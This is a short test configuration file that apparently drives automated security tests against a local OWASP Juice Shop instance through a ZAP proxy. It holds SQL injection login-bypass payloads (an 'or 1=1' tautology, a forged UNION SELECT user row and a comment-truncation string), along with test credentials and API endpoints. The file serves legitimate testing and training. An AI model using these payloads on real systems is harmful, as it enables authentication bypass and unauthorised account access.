SQLInjectionUsername=' or 1=1 --
LoginAsNonExistingUser = ' UNION SELECT * FROM (SELECT 1,'','acc0unt4nt@juice-sh.op','12345','customer','','0.0.0.0',null,'', 1,'1999-08-16 14:14:41.644 +00:00','1999-08-16 14:33:41.930 +00:00',null)--
LoginAsDeletedUser = chris@juice-sh.op' --
AmyUser = Amy@juice-sh.op
User= user@mail.com
User2= test2@mail.com
Password = 12345
url=http://localhost:3000
browser = firefox
browser_headless=firefox-headless
chromeZap=chrome_Zap
firefoxZap=firefox_Zap
zap_proxyhost = localhost
zap_proxyport = 8098
zap_proxyapi = null
Api_uri = http://localhost:3000/api
Rest_uri = http://localhost:3000/rest
Rest_oauDetails = /user/authentication-details/
Rest_Login = /user/login
Rest_Search = /products/search
